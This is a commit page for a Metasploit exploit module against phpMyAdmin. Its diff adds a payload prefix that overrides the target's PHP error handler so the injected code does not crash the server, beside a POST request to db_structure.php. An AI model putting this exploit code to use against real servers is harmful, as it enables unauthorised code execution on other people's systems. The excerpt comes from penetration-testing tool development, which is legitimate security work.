Clear out PMA's error handler
* Add an error_handler function that just returns true. This prevents eventual ENOMEM errors and segfaults like these: [Fri Apr 26 15:01:00 2013] [error] [client 127.0.0.1] PHP Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 44659282 bytes) in /home/egypt/repo/phpmyadmin/libraries/Error.class.php on line 156 [Fri Apr 26 15:01:16 2013] [notice] child pid 7347 exit signal Segmentation fault (11) * clean up some whitespaceunstable
parent
5900a7c03f
commit
a0c1b6d1ce
|
@ -38,6 +38,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "&\n=+%",
|
||||
# Clear out PMA's error handler so it doesn't lose its mind
|
||||
# and cause ENOMEM errors and segfaults in the destructor.
|
||||
'Prepend' => "function foo($a,$b,$c,$d,$e){return true;};set_error_handler(foo);"
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
|
@ -137,7 +140,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
db = rand_text_alpha(3+rand(3))
|
||||
|
||||
exploit_result = send_request_cgi({
|
||||
'uri' => uri('db_structure.php'),
|
||||
'method' => 'POST',
|
||||
|
|
Loading…
Reference in New Issue